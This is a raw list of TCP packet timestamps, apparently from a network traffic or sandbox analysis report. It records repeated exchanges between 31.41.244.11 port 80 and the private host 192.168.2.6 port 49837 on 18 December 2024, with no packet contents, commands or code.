                                                                                                                                                              Dec 18, 2024 11:47:29.627640009 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.627665043 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.627690077 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.628478050 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.628489017 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.628500938 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.628525019 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.628547907 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.629172087 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.629195929 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.629208088 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.629220963 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.629235029 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.630026102 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.630038977 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.630070925 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.630091906 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.630170107 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.630208969 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.630846977 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.630857944 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.630872011 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.630892992 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.630904913 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.631721020 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.631733894 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.631741047 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.631784916 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.632416010 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.632428885 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.632464886 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.632494926 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.632530928 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.632628918 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.633474112 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.633486032 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.633497000 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.633532047 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.633553028 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.634329081 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.634346962 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.634358883 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.634397030 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.634419918 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.634819031 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.634866953 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.634871960 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.634888887 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.634913921 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.634938955 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.635608912 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.635665894 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.635736942 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.635799885 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.635823011 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.636447906 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.636460066 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.636471987 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.636504889 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.636533022 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.637209892 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.637232065 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.637242079 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.637278080 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.637304068 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.638130903 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.638144970 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.638155937 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.638192892 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.638225079 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.638911963 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.638925076 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.638937950 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.638977051 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.639000893 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.639643908 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.639657021 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.639668941 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.639709949 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.639722109 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.640505075 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.640517950 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.640569925 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.640600920 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.641287088 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.641381979 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.641426086 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.641469002 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.641493082 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.642101049 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.642154932 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.642227888 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.642241955 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.642282009 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.642904043 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.642916918 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.642973900 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.643074036 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.643116951 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.643695116 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.643901110 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.643912077 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.643953085 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.643965006 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.644004107 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.644309044 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.644870996 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.644885063 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.644896984 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.644921064 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.644932985 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.645462036 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.645512104 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.645524025 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.645569086 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.646347046 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.646359921 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.646405935 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.646672964 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.646719933 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.647150993 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.647162914 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.647175074 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.647211075 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.647222996 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.647934914 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.647947073 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.647994995 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.648062944 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.648752928 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.648924112 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.648958921 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.648971081 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.648979902 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.648989916 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.649008989 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.649513006 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.649524927 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.649537086 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.649568081 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.649579048 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.650326967 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.650341034 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.650362015 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.650401115 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.650401115 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.651371956 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.651385069 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.651397943 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.651437998 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.652004004 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.652043104 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.652054071 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.652072906 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.652110100 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.652113914 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.652920008 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.652968884 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.652987003 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.652998924 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.653042078 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.653563023 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.653574944 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.653629065 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.817084074 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.817161083 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.817277908 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.817291975 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.817332029 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.817539930 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.817595959 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.817599058 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.817612886 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.817653894 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.818244934 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.818267107 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.818279982 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.818312883 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.818341970 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.819057941 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.819080114 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.819094896 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.819123983 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.819144964 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.819899082 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.819947004 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.819973946 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.819988012 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.820031881 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.820696115 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.820709944 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.820723057 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.820756912 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.821012974 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.821480036 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.821492910 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.821505070 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.821527958 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.821552992 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.822235107 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.822288990 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.822299957 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.822299957 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.822320938 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.822345972 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.823088884 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.823102951 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.823115110 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.823146105 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.823169947 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.823905945 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.823971987 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.824002028 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.824048996 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.824084044 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.824134111 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.824713945 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.824738979 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.824753046 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.824773073 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.824784994 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.824804068 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.825511932 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.825531960 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.825544119 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.825556993 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.825579882 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.825602055 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.826296091 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.826334000 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.826349020 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.826353073 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.826373100 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.826395035 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.827117920 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.827131987 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.827145100 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.827179909 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.827209949 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.828042030 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.828053951 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.828068018 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.828093052 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.828123093 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.828912973 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.828936100 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.828949928 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.828962088 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.828973055 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.829037905 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.829638004 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.829649925 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.829663992 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.829699039 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.829730988 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.830264091 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.830312967 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.830322981 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.830327034 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.830351114 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.830374956 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.831168890 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.831182003 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.831193924 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.831216097 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.831238031 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.831918955 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.831934929 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.831973076 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.831996918 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.832024097 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.832081079 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.832729101 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.832741976 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.832777023 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.832802057 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.832998037 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.833211899 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.833595991 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.833607912 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.833621025 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.833643913 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.833658934 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.834351063 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.834400892 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.834572077 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.834584951 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.834598064 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.834625959 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.834651947 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.835412979 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.835427046 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.835438967 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.835460901 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.835473061 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.836162090 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.836198092 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.836210966 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.836215973 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.836255074 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.837013006 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.837025881 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.837038994 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.837074995 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.837106943 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.837884903 CET804983731.41.244.11192.168.2.6
